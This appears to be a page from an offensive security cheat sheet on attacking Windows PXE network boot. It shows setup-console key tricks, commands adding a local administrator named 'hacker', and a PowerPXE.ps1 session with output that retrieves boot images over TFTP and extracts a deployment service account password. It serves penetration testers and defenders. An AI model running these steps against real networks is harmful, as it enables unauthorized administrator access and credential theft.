{"title": "Internal - PXE Boot Image", "source": "internal-att", "source_label": "InternalAllTheThings", "path": "active-directory/internal-pxe-boot-image", "html": "<h1 id=\"internal-pxe-boot-image\">Internal - PXE Boot Image</h1>\n<p>PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.</p>\n<ul>\n<li>Press <strong>[F8]</strong> during the PXE boot to spawn an administrator console on the deployed machine.</li>\n<li>\n<p>Press <strong>[SHIFT+F10]</strong> during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry.</p>\n<div class=\"highlight\"><pre><span></span><code><span class=\"n\">net</span> <span class=\"n\">user</span> <span class=\"n\">hacker</span> <span class=\"n\">Password123</span><span class=\"p\">!</span> <span class=\"p\">/</span><span class=\"n\">add</span>\n<span class=\"n\">net</span> <span class=\"n\">localgroup</span> <span class=\"n\">administrators</span> <span class=\"p\">/</span><span class=\"n\">add</span> <span class=\"n\">hacker</span>\n</code></pre></div>\n</li>\n<li>\n<p>Extract the pre-boot image (wim files) using <a href=\"https://github.com/wavestone-cdt/powerpxe\">PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)</a> and dig through it to find default passwords and domain accounts.</p>\n<div class=\"highlight\"><pre><span></span><code><span class=\"c\"># Import the module</span>\n<span class=\"nb\">PS </span><span class=\"p\">&gt;</span> <span class=\"nb\">Import-Module</span> <span class=\"p\">.\\</span><span class=\"n\">PowerPXE</span><span class=\"p\">.</span><span class=\"n\">ps1</span>\n\n<span class=\"c\"># Start the exploit on the Ethernet interface</span>\n<span class=\"nb\">PS </span><span class=\"p\">&gt;</span> <span class=\"nb\">Get-PXEcreds</span> <span class=\"n\">-InterfaceAlias</span> <span class=\"n\">Ethernet</span>\n<span class=\"nb\">PS </span><span class=\"p\">&gt;</span> <span class=\"nb\">Get-PXECreds</span> <span class=\"n\">-InterfaceAlias</span> <span class=\"err\">«</span> <span class=\"n\">lab</span> <span class=\"n\">0</span> <span class=\"err\">»</span> \n\n<span class=\"c\"># Wait for the DHCP to get an address</span>\n<span class=\"p\">&gt;&gt;</span> <span class=\"n\">Get</span> <span class=\"n\">a</span> <span class=\"n\">valid</span> <span class=\"n\">IP</span> <span class=\"n\">address</span>\n<span class=\"p\">&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;</span> <span class=\"n\">DHCP</span> <span class=\"n\">proposal</span> <span class=\"n\">IP</span> <span class=\"n\">address</span><span class=\"p\">:</span> <span class=\"n\">192</span><span class=\"p\">.</span><span class=\"n\">168</span><span class=\"p\">.</span><span class=\"n\">22</span><span class=\"p\">.</span><span class=\"n\">101</span>\n<span class=\"p\">&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;</span> <span class=\"n\">DHCP</span> <span class=\"n\">Validation</span><span class=\"p\">:</span> <span class=\"n\">DHCPACK</span>\n<span class=\"p\">&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;</span> <span class=\"n\">IP</span> <span class=\"n\">address</span> <span class=\"n\">configured</span><span class=\"p\">:</span> <span class=\"n\">192</span><span class=\"p\">.</span><span class=\"n\">168</span><span class=\"p\">.</span><span class=\"n\">22</span><span class=\"p\">.</span><span class=\"n\">101</span>\n\n<span class=\"c\"># Extract BCD path from the DHCP response</span>\n<span class=\"p\">&gt;&gt;</span> <span class=\"n\">Request</span> <span class=\"n\">BCD</span> <span class=\"n\">File</span> <span class=\"n\">path</span>\n<span class=\"p\">&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;</span> <span class=\"n\">BCD</span> <span class=\"n\">File</span> <span class=\"n\">path</span><span class=\"p\">:</span>  <span class=\"p\">\\</span><span class=\"n\">Tmp</span><span class=\"p\">\\</span><span class=\"n\">x86x64</span><span class=\"p\">{</span><span class=\"n\">5AF4E332-C90A</span><span class=\"p\">-</span><span class=\"n\">4015</span><span class=\"p\">-</span><span class=\"n\">9BA2-F8A7C9FF04E6</span><span class=\"p\">}.</span><span class=\"n\">bcd</span>\n<span class=\"p\">&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;</span> <span class=\"n\">TFTP</span> <span class=\"n\">IP</span> <span class=\"n\">Address</span><span class=\"p\">:</span>  <span class=\"n\">192</span><span class=\"p\">.</span><span class=\"n\">168</span><span class=\"p\">.</span><span class=\"n\">22</span><span class=\"p\">.</span><span class=\"n\">3</span>\n\n<span class=\"c\"># Download the BCD file and extract wim files</span>\n<span class=\"p\">&gt;&gt;</span> <span class=\"n\">Launch</span> <span class=\"n\">TFTP</span> <span class=\"n\">download</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">Transfer</span> <span class=\"n\">succeeded</span><span class=\"p\">.</span>\n<span class=\"p\">&gt;&gt;</span> <span class=\"n\">Parse</span> <span class=\"n\">the</span> <span class=\"n\">BCD</span> <span class=\"n\">file</span><span class=\"p\">:</span> <span class=\"n\">conf</span><span class=\"p\">.</span><span class=\"n\">bcd</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">Identify</span> <span class=\"n\">wim</span> <span class=\"n\">file</span> <span class=\"p\">:</span> <span class=\"p\">\\</span><span class=\"n\">Boot</span><span class=\"p\">\\</span><span class=\"n\">x86</span><span class=\"p\">\\</span><span class=\"n\">Images</span><span class=\"p\">\\</span><span class=\"n\">LiteTouchPE_x86</span><span class=\"p\">.</span><span class=\"n\">wim</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">Identify</span> <span class=\"n\">wim</span> <span class=\"n\">file</span> <span class=\"p\">:</span> <span class=\"p\">\\</span><span class=\"n\">Boot</span><span class=\"p\">\\</span><span class=\"n\">x64</span><span class=\"p\">\\</span><span class=\"n\">Images</span><span class=\"p\">\\</span><span class=\"n\">LiteTouchPE_x64</span><span class=\"p\">.</span><span class=\"n\">wim</span>\n<span class=\"p\">&gt;&gt;</span> <span class=\"n\">Launch</span> <span class=\"n\">TFTP</span> <span class=\"n\">download</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">Transfer</span> <span class=\"n\">succeeded</span><span class=\"p\">.</span>\n\n<span class=\"c\"># Parse wim files to find interesting data</span>\n<span class=\"p\">&gt;&gt;</span> <span class=\"n\">Open</span> <span class=\"n\">LiteTouchPE_x86</span><span class=\"p\">.</span><span class=\"n\">wim</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">Finding</span> <span class=\"n\">Bootstrap</span><span class=\"p\">.</span><span class=\"n\">ini</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">DeployRoot</span> <span class=\"p\">=</span> <span class=\"p\">\\\\</span><span class=\"n\">LAB-MDT</span><span class=\"p\">\\</span><span class=\"n\">DeploymentShare</span><span class=\"p\">$</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">UserID</span> <span class=\"p\">=</span> <span class=\"n\">MdtService</span>\n<span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"p\">&gt;&gt;&gt;&gt;</span> <span class=\"n\">UserPassword</span> <span class=\"p\">=</span> <span class=\"n\">Somepass1</span>\n</code></pre></div>\n</li>\n</ul>\n<h2 id=\"references\">References</h2>\n<ul>\n<li><a href=\"https://blog.netspi.com/attacks-against-windows-pxe-boot-images/\">Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling</a></li>\n<li><a href=\"https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE\">COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger</a></li>\n</ul>", "excerpt": "Internal - PXE Boot Image PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with…", "tags": []}